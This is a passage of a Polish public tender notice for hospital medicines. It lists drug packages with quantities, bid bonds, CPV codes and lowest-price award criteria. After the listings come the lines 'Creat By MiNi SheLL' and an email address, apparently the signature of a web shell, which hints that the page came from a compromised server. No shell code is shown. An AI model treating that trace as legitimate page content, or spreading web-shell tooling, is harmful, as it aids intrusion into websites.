3	CLOTRIMAZOLUM KREM 20 G	OPAKOWANIE	40
4	CLOTRIMAZOLUM TABL. DOPO 0,1 G x 6	OPAKOWANIE	100
5	FENOTEROLUM TABL. 0,005 G x 100	OPAKOWANIE	10
6	BIZMUTAWY GALUSAN ZASADOWY + BIZMUTAWY  TLENEK + BIZMUTAWY OXYJODOGALUSAN + REZORCYNA + KWAS BOROWY + TLENEK CYNKU + BALSAM PERUWIAŃSKI CZOPKI  x 10	OPAKOWANIE	40
7	KALII CHLORIDUM TABL. 0,75 G = 10 MEQ POTA x 30	OPAKOWANIE	800
8	PHENOBARBITALUM CZOPKI 0,015 G x 10	OPAKOWANIE	60
9	METRONIDAZOLUM CZOPKI 0,5 G x 10	OPAKOWANIE	5
10	METRONIDAZOLUM CZOPKI 1 G x 10	OPAKOWANIE	5
11	NITRAZEPAMUM TABL. 0,005 G x 20	OPAKOWANIE	60
12	OXAZEPAMUM TABL. 0,01 G x 20	OPAKOWANIE	400
13	THEOPHYLLINUM TABL. 300 MG x 50	OPAKOWANIE	400
14	DIAZEPAMUM TABL. 0,002 G x 20	OPAKOWANIE	100
15	DIAZEPAMUM TABL. 0,005 G x 20	OPAKOWANIE	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 10 Wadium 500,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa leku	JM	Ilość
1	ACIDUM BENZOICUM SUBST.  1KG x 1	KILOGRAMY	1,00
2	ACIDUM BORICUM SUBST. 1KG x 1	KILOGRAMY	2,00
3	AMMONIUM BROMATUM SUBST.  1 KG. X 1	KILOGRAMY	0,50
4	ARGENTUM NITRICUM SUBST.  1 KG x 1	KILOGRAMY	0,10
5	ATROPINUM SULFURICUM SUBST. 1 G x1	GRAMY	10,00
6	CODEINUM PHOSPHORICUM  SUBST.  1 KG x 1	KILOGRAMY	0,05
7	CHLORAMPHENICOL SUBST.  1 KG x 1	KILOGRAMY	0,10
8	EPHEDRINUM HYDROCHLORICUM SUBST. 1KG x1	KILOGRAMY	0,01
9	ETHACRIDINI LACTAS SUBST.  1 KG x 1	KILOGRAMY	0,40
10	METHYLROSANILINIUM CHLORIDE SUBST x 1	KILOGRAMY	0,01
11	FORMALDEHYDE PŁYN 40%  1 KG x1	KILOGRAMY	30,00
12	GLUCOSUM FPIV SUBST. 1 KG x 1	OPAKOWANIE	100,00
13	GLYCEROLUM PŁYN 86% x1	KILOGRAMY	1,00
14	HOMATROPINUM HYDROBROMICUM SUBST.  1G X1	GRAMY	10,00
15	JODYNA PŁYN 1 KG x1	KILOGRAMY	8,00
16	KALIUM BROMATUM SUBST.  1 KG x 1	KILOGRAMY	1,00
17	KALIUM JODATUM SUBST.  1 KG x 1	KILOGRAMY	0,20
18	NATRIUM BICARBONICUM SUBST.  1 KG x 1	KILOGRAMY	1,00
19	NATRIUM BROMATUM SUBST.  1 KG x 1	KILOGRAMY	10,00
20	NATRIUM CHLORATUM SUBST.  1 KG x 1	OPAKOWANIE	20,00
21	NEOMYCIN  SUBST. 1G x 1	GRAMY	100,00
22	OLEUM CACAO SUBST. 1 KG x 1	KILOGRAMY	0,20
23	RICINI OLEUM PŁYN  1 KG x 1	KILOGRAMY	20,00
24	PARAFFINUM LIQUIDUM PŁYN  1 KG x 1	KILOGRAMY	40,00
25	HYDROGEN PEROXIDE PŁYN 30%  1 KG x 1	KILOGRAMY	20,00
26	PILOCARPINUM HYDROCHLORICUM SUBST. 1G  X1	OPAKOWANIE	20,00
27	LACTOSE SUBST.  1 KG x 1	KILOGRAMY	0,50
28	SCOPOLAMINUM HYDROBROMICUM SUBST. 1 G x1	GRAMY	5,00
29	SPIRYTUS SALICYLOWY PŁYN 2% x1	KILOGRAMY	400,00
30	TALCUM SUBST. 1 KG x 1	KILOGRAMY	2,00
31	TINCTURA ADONIDIS VERNALIS TIT PŁYN 1KG x1	KILOGRAMY	20,00
32	TINCTURA VALERIANAE  PŁYN 800 G x1	KILOGRAMY	30,00
33	VASELINUM ALBUM PODŁOŻE DO 1 KG x 1	KILOGRAMY	5,00
34	BISMUTH SUBGALLATE SUBST. X1	KILIGRAM	0,50
35	CALCIUM CARBONATE SUBST. X1	KILIGRAM	10,00
36	JODINE SUBST. X1	KILIGRAM	0,04
37	GENTAMICIN SUBST. X1	GRAM	100,00
38	LANOLINUM ANHYDRICUM SUBST. X1	KILIGRAM	0,20
39	PHENOBARBITALUM NATRIUM SUBST. X1	KILIGRAM	0,50
40	HYDROCORTISONUM SUBST 10 G X1	OPAKOWANIE	12,00
41	EUCERINUM PODŁOŻE DO MAŚĆI X1	KILOGRAMY	1,00
42	CHLORHEXIDINUM GLUCONICUM 20% PŁYN 500 ML 1	FLAKON	50,00
43	BENZYNA APTECZNA PŁYN X1L	OPAKOWANIE	100,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 41 Wadium 400,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa leku	JM	Ilość
1	HYALURONIDASE x 10 amp.	OPAKOWANIE	24
2	ISOPROPYLONORADRENALINA x 25 amp.	OPAKOWANIE	2
3	POVIDONE-IODINE 5% GUTTAE OPHT. 30 ml x1	FLAKON	8
4	ACETYLOCHOLINCHLORID 2 ml amp. X1	AMPUŁKA	100
5	ACETAZOLAMID 500 mg/5ml x1	FIOLKA	20
6	METHERGIN 0,2 mg/ml x 10 amp.	OPAKOWANIE	20
7	PHENYLEPHRINE HYDROCHLORIDE MINIMS 2,5% GUTTEE OPHT.x1	OPAKOWANIE	8
8	KWAS FUSYDOWY fiol. 500 mg, amp. 10 ml dożylnie x1	FIOLKA	10
9	HYPROMELLOSE 30ml x1	FLAKON	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 48 Wadium 500,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa leku	JM	Ilość
1	CEREBROLYSIN INJ 10 ML X 5 AMP.	OPAKOWANIE	120
2	CARVEDILOL 6,25 X 30 TABL.	OPAKOWANIE	200
3	CARVEDILOL 12,5 X 30 TABL.	OPAKOWANIE	200
4	ACETYLOCYSTEINA AMP. 3 ML (100 MG/ML) X 5 AMP.	OPAKOWANIE	10
5	FENOFIBRAT 200 MG X 30 KAPS.	OPAKOWANIE	20
6	FENOFIBRAT 267 M X 30 KAPS.	OPAKOWANIE	20
7	FENOFIBRAT 145 NT X 30 KAPS.	OPAKOWANIE	5
8	FENOFIBRAT 160 MG SUPRA X 30 KAPS.	OPAKOWANIE	5
9	NEBIVOLOL 5 MG X 28 TABL.	OPAKOWANIE	50
10	TICLOPIDINE 250 MG X 20 TABL.	OPAKOWANIE	30
11	FENOBARBITAL 20 MG, 0,3 MG WINIAN ERGOTAMINY, 0,1 MG ZESPOŁU ALKALOIDÓW TROPANOWYCH X 30 TABL.	OPAKOWANIE	10
12	PROPOFOL 1 % 50 ML x1	FLAKON	30
13	PROPOFOL 2 % 50 ML x1	FLAKON	30
14	PROPOFOL 2 % 20 ML x1	FLAKON	30
15	PAMIDRONIC ACID FIOL. 90 MG x1	FIOLKA	10
16	ONDANSETRON AMP. 4 MG / 2 ML X 5 AMP.	OPAKOWANIE	3
17	ONDANSETRON AMP. 8 MG / 4 ML X 5 AMP.	OPAKOWANIE	3
18	KONCENTRAT DWUPEPTYDU 200 MG/ML FLAKON 100 ML x1	FLAKON	10
19	CEFEPIME INJ. 2 G x1	FIOLKA	20
20	BENAZAPRIL 10 MG X 30 TABL.	OPAKOWANIE	10
21	FINASTERIDE 5 MG X 30 TABL.	OPAKOWANIE	10
22	TAMSULOSIN 0,4 MG X 30 TABL.	OPAKOWANIE	10
23	DOXAZOSIN 4 MG X 30 TABL.	OPAKOWANIE	3
24	TIOTROPIUM BROMIDE 22,5 MG X 30 KAPS + INHALATOR 	OPAKOWANIE	5
25	LISINOPRIL 10 MG X 30 TABL.	OPAKOWANIE	10
26	IBANDRONIC ACID 3 MG / 3 ML INJ. DOŻYLNA AMP.-STRZYK. X1	AMPUŁKI	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 54 Wadium 5 000,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet zawiera 2204 pozycji. Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 2 (część 2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 55 Bez wadium.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	JM	Ilość
1	ACIDUM BORICUM PULV.  1 G	gram	1
2	ACIDUM SALICYLICUM PULV.  1 G	gram	16
3	AMMONIUM BROMATUM PULV.  1 G	gram	26
4	AQUA  PURYFIKATA   500	szt.	8
5	AQUA CALCARIE   1G	gram	71
6	AZULAN PLYN  30 G	szt.	2
7	BUTELKA 30 ML  	szt.	4
8	BUTELKA 100 G  	szt.	5
9	BUTELKA 300 G  	szt.	4
10	BUTELKA 500 G  	szt.	18
11	BUTELKA 1000ML  	szt.	1
12	CALCIUM CHLORATUM SUBS.  G	gram	18
13	CIGANTRAL (CIGNOLIN) PULV.  1 G	gram	2
14	DEVIKAP VIT D3 15000 J.M./1 ML 10ML	szt.	12
15	EUCERINUM   1 G	gram	161
16	GLICERINUM PLYN  1 G	gram	2 350
17	HASCOBAZA MASC  1G	gram	462
18	KALIUM BROMATUM   1	gram	41
19	LEKOBAZA PODŁOŻE MAŚCIOWE  100 G	szt.	2
20	LIDOCAINUM SUBS  1 G	gram	2
21	MASC CHOLESTEROLOWA  100	szt.	3
22	MAŚĆ CHOLESTEROLOWA MAŚĆ 0,03 250 G	szt.	2
23	MENTHOLUM   1 G	gram	10
24	NATRIUM BROMATUM SUBSTANCJA  1 G	gram	51
25	NEOSPASMINA SYROP  1 G	gram	100
26	RESORCINUM PULV.  1 G	gram	16
27	Rp. Butelka apteczna  250 ml  sr.28  1 szt   	szt.	10
28	Rp. Butelka bez nakrętki  40 ml  1 szt(22)   	szt.	2
29	SPIR.VINI PLYN 95 GRAD.  1000	gram	421
30	SULFUR PREACIPITATUM PULV.  1 G	gram	13
31	TINCT.ADONIS VERNALIS NALEWKA  1 G	gram	140
32	TINCT.CONVALLARIAE TITR. FLUID.  1 G	gram	140
33	TINCT.VALERIANAE FLUID.  1 G	gram	140
34	VASELINUM ALBUM   1 G	gram	98
35	VASELINUM FLAVUM MASC  1 G	gram	245
36	VIT.A PLYN 50000 J.M/ML 50000 J.M./1 ML 10	szt.	15
37	VIT.B6 INJ. 0.05 G / 2 ML 0,05 G/2 ML 5AMP.	szt.	1
38	VIT.E KR  10ML	szt.	14
39	WAZELINA ŻÓŁTA PODŁOŻE MAŚCIOWE  200 G	szt.	1
40	WODA OCZYSZCZONA PŁYN 1 KG 1000	gram	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com